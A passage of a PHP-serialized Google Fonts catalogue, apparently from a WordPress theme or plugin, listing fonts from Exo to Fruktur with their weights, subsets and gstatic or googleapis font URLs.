/fr4HBfXHYiIngW2_bhlgRw.ttf";i:300;s:60:"http://fonts.gstatic.com/s/exo/v4/SBrN7TKUqgGUvfxqHqsnNw.ttf";s:9:"300italic";s:60:"http://fonts.gstatic.com/s/exo/v4/3gmiLjBegIfcDLISjTGA1g.ttf";s:7:"regular";s:60:"http://fonts.gstatic.com/s/exo/v4/eUEzTFueNXRVhbt4PEB8kQ.ttf";s:6:"italic";s:60:"http://fonts.gstatic.com/s/exo/v4/cfgolWisMSURhpQeVHl_NA.ttf";i:500;s:60:"http://fonts.gstatic.com/s/exo/v4/jCg6DmGGXt_OVyp5ofQHPw.ttf";s:9:"500italic";s:60:"http://fonts.gstatic.com/s/exo/v4/lo5eTdCNJZQVN08p8RnzAQ.ttf";i:600;s:60:"http://fonts.gstatic.com/s/exo/v4/q_SG5kXUmOcIvFpgtdZnlw.ttf";s:9:"600italic";s:60:"http://fonts.gstatic.com/s/exo/v4/0cExa8K_pxS2lTuMr68XUA.ttf";i:700;s:60:"http://fonts.gstatic.com/s/exo/v4/3_jwsL4v9uHjl5Q37G57mw.ttf";s:9:"700italic";s:60:"http://fonts.gstatic.com/s/exo/v4/0me55yJIxd5vyQ9bF7SsiA.ttf";i:800;s:60:"http://fonts.gstatic.com/s/exo/v4/yLPuxBuV0lzqibRJyooOJg.ttf";s:9:"800italic";s:60:"http://fonts.gstatic.com/s/exo/v4/n3LejeKVj_8gtZq5fIgNYw.ttf";i:900;s:60:"http://fonts.gstatic.com/s/exo/v4/97d0nd6Yv4-SA_X92xAuZA.ttf";s:9:"900italic";s:60:"http://fonts.gstatic.com/s/exo/v4/JHTkQVhzyLtkY13Ye95TJQ.ttf";}s:4:"urls";a:18:{i:100;s:47:"https://fonts.googleapis.com/css?family=Exo:100";s:9:"100italic";s:53:"https://fonts.googleapis.com/css?family=Exo:100italic";i:200;s:47:"https://fonts.googleapis.com/css?family=Exo:200";s:9:"200italic";s:53:"https://fonts.googleapis.com/css?family=Exo:200italic";i:300;s:47:"https://fonts.googleapis.com/css?family=Exo:300";s:9:"300italic";s:53:"https://fonts.googleapis.com/css?family=Exo:300italic";s:7:"regular";s:51:"https://fonts.googleapis.com/css?family=Exo:regular";s:6:"italic";s:50:"https://fonts.googleapis.com/css?family=Exo:italic";i:500;s:47:"https://fonts.googleapis.com/css?family=Exo:500";s:9:"500italic";s:53:"https://fonts.googleapis.com/css?family=Exo:500italic";i:600;s:47:"https://fonts.googleapis.com/css?family=Exo:600";s:9:"600italic";s:53:"https://fonts.googleapis.com/css?family=Exo:600italic";i:700;s:47:"https://fonts.googleapis.com/css?family=Exo:700";s:9:"700italic";s:53:"https://fonts.googleapis.com/css?family=Exo:700italic";i:800;s:47:"https://fonts.googleapis.com/css?family=Exo:800";s:9:"800italic";s:53:"https://fonts.googleapis.com/css?family=Exo:800italic";i:900;s:47:"https://fonts.googleapis.com/css?family=Exo:900";s:9:"900italic";s:53:"https://fonts.googleapis.com/css?family=Exo:900italic";}}s:5:"exo_2";a:7:{s:4:"name";s:5:"Exo 2";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:18:{i:100;s:61:"http://fonts.gstatic.com/s/exo2/v3/oVOtQy53isv97g4UhBUDqg.ttf";s:9:"100italic";s:61:"http://fonts.gstatic.com/s/exo2/v3/LNYVgsJcaCxoKFHmd4AZcg.ttf";i:200;s:61:"http://fonts.gstatic.com/s/exo2/v3/qa-Ci2pBwJdCxciE1ErifQ.ttf";s:9:"200italic";s:82:"http://fonts.gstatic.com/s/exo2/v3/DCrVxDVvS69n50O-5erZVvesZW2xOQ-xsNqO47m55DA.ttf";i:300;s:61:"http://fonts.gstatic.com/s/exo2/v3/nLUBdz_lHHoVIPor05Byhw.ttf";s:9:"300italic";s:82:"http://fonts.gstatic.com/s/exo2/v3/iSy9VTeUTiqiurQg2ywtu_esZW2xOQ-xsNqO47m55DA.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/exo2/v3/Pf_kZuIH5c5WKVkQUaeSWQ.ttf";s:6:"italic";s:61:"http://fonts.gstatic.com/s/exo2/v3/xxA5ZscX9sTU6U0lZJUlYA.ttf";i:500;s:61:"http://fonts.gstatic.com/s/exo2/v3/oM0rzUuPqVJpW-VEIpuW5w.ttf";s:9:"500italic";s:82:"http://fonts.gstatic.com/s/exo2/v3/amzRVCB-gipwdihZZ2LtT_esZW2xOQ-xsNqO47m55DA.ttf";i:600;s:61:"http://fonts.gstatic.com/s/exo2/v3/YnSn3HsyvyI1feGSdRMYqA.ttf";s:9:"600italic";s:82:"http://fonts.gstatic.com/s/exo2/v3/Vmo58BiptGwfVFb0teU5gPesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:61:"http://fonts.gstatic.com/s/exo2/v3/2DiK4XkdTckfTk6we73-bQ.ttf";s:9:"700italic";s:82:"http://fonts.gstatic.com/s/exo2/v3/Sdo-zW-4_--pDkTg6bYrY_esZW2xOQ-xsNqO47m55DA.ttf";i:800;s:61:"http://fonts.gstatic.com/s/exo2/v3/IVYl_7dJruOg8zKRpC8Hrw.ttf";s:9:"800italic";s:82:"http://fonts.gstatic.com/s/exo2/v3/p0TA6KeOz1o4rySEbvUxI_esZW2xOQ-xsNqO47m55DA.ttf";i:900;s:61:"http://fonts.gstatic.com/s/exo2/v3/e8csG8Wnu87AF6uCndkFRQ.ttf";s:9:"900italic";s:82:"http://fonts.gstatic.com/s/exo2/v3/KPhsGCoT2-7Uj6pMlRscH_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:18:{i:100;s:49:"https://fonts.googleapis.com/css?family=Exo+2:100";s:9:"100italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:100italic";i:200;s:49:"https://fonts.googleapis.com/css?family=Exo+2:200";s:9:"200italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:200italic";i:300;s:49:"https://fonts.googleapis.com/css?family=Exo+2:300";s:9:"300italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:300italic";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Exo+2:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Exo+2:italic";i:500;s:49:"https://fonts.googleapis.com/css?family=Exo+2:500";s:9:"500italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:500italic";i:600;s:49:"https://fonts.googleapis.com/css?family=Exo+2:600";s:9:"600italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:600italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Exo+2:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:700italic";i:800;s:49:"https://fonts.googleapis.com/css?family=Exo+2:800";s:9:"800italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:800italic";i:900;s:49:"https://fonts.googleapis.com/css?family=Exo+2:900";s:9:"900italic";s:55:"https://fonts.googleapis.com/css?family=Exo+2:900italic";}}s:13:"expletus_sans";a:7:{s:4:"name";s:13:"Expletus Sans";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:8:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"500";i:3;s:9:"500italic";i:4;s:3:"600";i:5;s:9:"600italic";i:6;s:3:"700";i:7;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:8:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/expletussans/v9/gegTSDBDs5le3g6uxU1ZsX8f0n03UdmQgF_CLvNR2vg.ttf";s:6:"italic";s:90:"http://fonts.gstatic.com/s/expletussans/v9/Y-erXmY0b6DU_i2Qu0hTJj4G9C9ttb0Oz5Cvf0qOitE.ttf";i:500;s:90:"http://fonts.gstatic.com/s/expletussans/v9/cl6rhMY77Ilk8lB_uYRRwAqQmZ7VjhwksfpNVG0pqGc.ttf";s:9:"500italic";s:90:"http://fonts.gstatic.com/s/expletussans/v9/sRBNtc46w65uJE451UYmW87DCVO6wo6i5LKIyZDzK40.ttf";i:600;s:90:"http://fonts.gstatic.com/s/expletussans/v9/cl6rhMY77Ilk8lB_uYRRwCvj1tU7IJMS3CS9kCx2B3U.ttf";s:9:"600italic";s:90:"http://fonts.gstatic.com/s/expletussans/v9/sRBNtc46w65uJE451UYmW8yKH23ZS6zCKOFHG0e_4JE.ttf";i:700;s:90:"http://fonts.gstatic.com/s/expletussans/v9/cl6rhMY77Ilk8lB_uYRRwFCbmAUID8LN-q3pJpOk3Ys.ttf";s:9:"700italic";s:90:"http://fonts.gstatic.com/s/expletussans/v9/sRBNtc46w65uJE451UYmW5F66r9C4AnxxlBlGd7xY4g.ttf";}s:4:"urls";a:8:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Expletus+Sans:regular";s:6:"italic";s:60:"https://fonts.googleapis.com/css?family=Expletus+Sans:italic";i:500;s:57:"https://fonts.googleapis.com/css?family=Expletus+Sans:500";s:9:"500italic";s:63:"https://fonts.googleapis.com/css?family=Expletus+Sans:500italic";i:600;s:57:"https://fonts.googleapis.com/css?family=Expletus+Sans:600";s:9:"600italic";s:63:"https://fonts.googleapis.com/css?family=Expletus+Sans:600italic";i:700;s:57:"https://fonts.googleapis.com/css?family=Expletus+Sans:700";s:9:"700italic";s:63:"https://fonts.googleapis.com/css?family=Expletus+Sans:700italic";}}s:12:"fanwood_text";a:7:{s:4:"name";s:12:"Fanwood Text";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/fanwoodtext/v6/hDNDHUlsSb8bgnEmDp4T_i3USBnSvpkopQaUR-2r7iU.ttf";s:6:"italic";s:89:"http://fonts.gstatic.com/s/fanwoodtext/v6/0J3SBbkMZqBV-3iGxs5E9_MZXuCXbOrAvx5R0IT5Oyo.ttf";}s:4:"urls";a:2:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Fanwood+Text:regular";s:6:"italic";s:59:"https://fonts.googleapis.com/css?family=Fanwood+Text:italic";}}s:6:"farsan";a:7:{s:4:"name";s:6:"Farsan";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/farsan/v1/Hdf9Y76SQ6e1X0Nqk3rHtw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Farsan:regular";}}s:9:"fascinate";a:7:{s:4:"name";s:9:"Fascinate";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/fascinate/v5/ZE0637WWkBPKt1AmFaqD3Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Fascinate:regular";}}s:16:"fascinate_inline";a:7:{s:4:"name";s:16:"Fascinate Inline";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/fascinateinline/v6/lRguYfMfWArflkm5aOQ5QJmp8DTZ6iHear7UV05iykg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Fascinate+Inline:regular";}}s:10:"faster_one";a:7:{s:4:"name";s:10:"Faster One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/fasterone/v6/YxTOW2sf56uxD1T7byP5K_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Faster+One:regular";}}s:8:"fasthand";a:7:{s:4:"name";s:8:"Fasthand";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/fasthand/v7/6XAagHH_KmpZL67wTvsETQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Fasthand:regular";}}s:9:"fauna_one";a:7:{s:4:"name";s:9:"Fauna One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/faunaone/v4/8kL-wpAPofcAMELI_5NRnQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Fauna+One:regular";}}s:8:"federant";a:7:{s:4:"name";s:8:"Federant";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/federant/v8/tddZFSiGvxICNOGra0i5aA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Federant:regular";}}s:6:"federo";a:7:{s:4:"name";s:6:"Federo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/federo/v8/JPhe1S2tujeyaR79gXBLeQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Federo:regular";}}s:6:"felipa";a:7:{s:4:"name";s:6:"Felipa";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/felipa/v4/SeyfyFZY7abAQXGrOIYnYg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Felipa:regular";}}s:5:"fenix";a:7:{s:4:"name";s:5:"Fenix";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/fenix/v4/Ak8wR3VSlAN7VN_eMeJj7Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Fenix:regular";}}s:12:"finger_paint";a:7:{s:4:"name";s:12:"Finger Paint";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/fingerpaint/v5/m_ZRbiY-aPb13R3DWPBGXy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Finger+Paint:regular";}}s:9:"fira_mono";a:7:{s:4:"name";s:9:"Fira Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:12:"cyrillic-ext";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/firamono/v4/WQOm1D4RO-yvA9q9trJc8g.ttf";i:700;s:86:"http://fonts.gstatic.com/s/firamono/v4/l24Wph3FsyKAbJ8dfExTZy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Fira+Mono:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Fira+Mono:700";}}s:9:"fira_sans";a:7:{s:4:"name";s:9:"Fira Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:8:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"500";i:5;s:9:"500italic";i:6;s:3:"700";i:7;s:9:"700italic";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:12:"cyrillic-ext";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:8:{i:300;s:86:"http://fonts.gstatic.com/s/firasans/v6/VTBnrK42EiOBncVyQXZ7jy3USBnSvpkopQaUR-2r7iU.ttf";s:9:"300italic";s:86:"http://fonts.gstatic.com/s/firasans/v6/6s0YCA9oCTF6hM60YM-qTS9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/firasans/v6/nsT0isDy56OkSX99sFQbXw.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/firasans/v6/cPT_2ddmoxsUuMtQqa8zGqCWcynf_cDxXwCLxiixG1c.ttf";i:500;s:86:"http://fonts.gstatic.com/s/firasans/v6/zM2u8V3CuPVwAAXFQcDi4C3USBnSvpkopQaUR-2r7iU.ttf";s:9:"500italic";s:86:"http://fonts.gstatic.com/s/firasans/v6/6s0YCA9oCTF6hM60YM-qTcCNfqCYlB_eIx7H1TVXe60.ttf";i:700;s:86:"http://fonts.gstatic.com/s/firasans/v6/DugPdSljmOTocZOR2CItOi3USBnSvpkopQaUR-2r7iU.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/firasans/v6/6s0YCA9oCTF6hM60YM-qTXe1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:8:{i:300;s:53:"https://fonts.googleapis.com/css?family=Fira+Sans:300";s:9:"300italic";s:59:"https://fonts.googleapis.com/css?family=Fira+Sans:300italic";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Fira+Sans:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Fira+Sans:italic";i:500;s:53:"https://fonts.googleapis.com/css?family=Fira+Sans:500";s:9:"500italic";s:59:"https://fonts.googleapis.com/css?family=Fira+Sans:500italic";i:700;s:53:"https://fonts.googleapis.com/css?family=Fira+Sans:700";s:9:"700italic";s:59:"https://fonts.googleapis.com/css?family=Fira+Sans:700italic";}}s:10:"fjalla_one";a:7:{s:4:"name";s:10:"Fjalla One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/fjallaone/v4/3b7vWCfOZsU53vMa8LWsf_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Fjalla+One:regular";}}s:9:"fjord_one";a:7:{s:4:"name";s:9:"Fjord One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/fjordone/v5/R_YHK8au2uFPw5tNu5N7zw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Fjord+One:regular";}}s:8:"flamenco";a:7:{s:4:"name";s:8:"Flamenco";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:3:"300";i:1;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{i:300;s:86:"http://fonts.gstatic.com/s/flamenco/v6/x9iI5CogvuZVCGoRHwXuo6CWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/flamenco/v6/HC0ugfLLgt26I5_BWD1PZA.ttf";}s:4:"urls";a:2:{i:300;s:52:"https://fonts.googleapis.com/css?family=Flamenco:300";s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Flamenco:regular";}}s:7:"flavors";a:7:{s:4:"name";s:7:"Flavors";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/flavors/v5/SPJi5QclATvon8ExcKGRvQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Flavors:regular";}}s:10:"fondamento";a:7:{s:4:"name";s:10:"Fondamento";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/fondamento/v6/6LWXcjT1B7bnWluAOSNfMPesZW2xOQ-xsNqO47m55DA.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/fondamento/v6/y6TmwhSbZ8rYq7OTFyo7OS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Fondamento:regular";s:6:"italic";s:57:"https://fonts.googleapis.com/css?family=Fondamento:italic";}}s:16:"fontdiner_swanky";a:7:{s:4:"name";s:16:"Fontdiner Swanky";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/fontdinerswanky/v6/8_GxIO5ixMtn5P6COsF3TlBjMPLzPAFJwRBn-s1U7kA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Fontdiner+Swanky:regular";}}s:5:"forum";a:7:{s:4:"name";s:5:"Forum";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/forum/v7/MZUpsq1VfLrqv8eSDcbrrQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Forum:regular";}}s:12:"francois_one";a:7:{s:4:"name";s:12:"Francois One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/francoisone/v9/bYbkq2nU2TSx4SwFbz5sCC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Francois+One:regular";}}s:16:"frank_ruhl_libre";a:7:{s:4:"name";s:16:"Frank Ruhl Libre";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"700";i:4;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:6:"hebrew";}s:5:"files";a:5:{i:300;s:92:"http://fonts.gstatic.com/s/frankruhllibre/v1/y8NWif61iD8Hg8bGAmxFPOo9jvbqtCEVUIntIHarXsc.ttf";s:7:"regular";s:92:"http://fonts.gstatic.com/s/frankruhllibre/v1/yDLloNqBpFmakCImLv4OJkfFI6QBbouvcOFcz81E3Ek.ttf";i:500;s:92:"http://fonts.gstatic.com/s/frankruhllibre/v1/y8NWif61iD8Hg8bGAmxFPC-WNtISbX_UO2d0wZPgXtk.ttf";i:700;s:92:"http://fonts.gstatic.com/s/frankruhllibre/v1/y8NWif61iD8Hg8bGAmxFPDPYiZEMiRRbPdIFMoTwDbo.ttf";i:900;s:92:"http://fonts.gstatic.com/s/frankruhllibre/v1/y8NWif61iD8Hg8bGAmxFPNRZIVFRjDx-6MOpcoWbVhA.ttf";}s:4:"urls";a:5:{i:300;s:60:"https://fonts.googleapis.com/css?family=Frank+Ruhl+Libre:300";s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Frank+Ruhl+Libre:regular";i:500;s:60:"https://fonts.googleapis.com/css?family=Frank+Ruhl+Libre:500";i:700;s:60:"https://fonts.googleapis.com/css?family=Frank+Ruhl+Libre:700";i:900;s:60:"https://fonts.googleapis.com/css?family=Frank+Ruhl+Libre:900";}}s:12:"freckle_face";a:7:{s:4:"name";s:12:"Freckle Face";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/freckleface/v4/7-B8j9BPJgazdHIGqPNv8y3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Freckle+Face:regular";}}s:20:"fredericka_the_great";a:7:{s:4:"name";s:20:"Fredericka the Great";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/frederickathegreat/v5/7Es8Lxoku-e5eOZWpxw18nrnet6gXN1McwdQxS1dVrI.ttf";}s:4:"urls";a:1:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Fredericka+the+Great:regular";}}s:11:"fredoka_one";a:7:{s:4:"name";s:11:"Fredoka One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/fredokaone/v4/QKfwXi-z-KtJAlnO2ethYqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Fredoka+One:regular";}}s:8:"freehand";a:7:{s:4:"name";s:8:"Freehand";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/freehand/v8/uEBQxvA0lnn_BrD6krlxMw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Freehand:regular";}}s:6:"fresca";a:7:{s:4:"name";s:6:"Fresca";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/fresca/v5/2q7Qm9sCo1tWvVgSDVWNIw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Fresca:regular";}}s:7:"frijole";a:7:{s:4:"name";s:7:"Frijole";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/frijole/v5/L2MfZse-2gCascuD-nLhWg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Frijole:regular";}}s:7:"fruktur";a:7:{s:4:"name";s:7:"Fruktur";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/fruktur/v8/P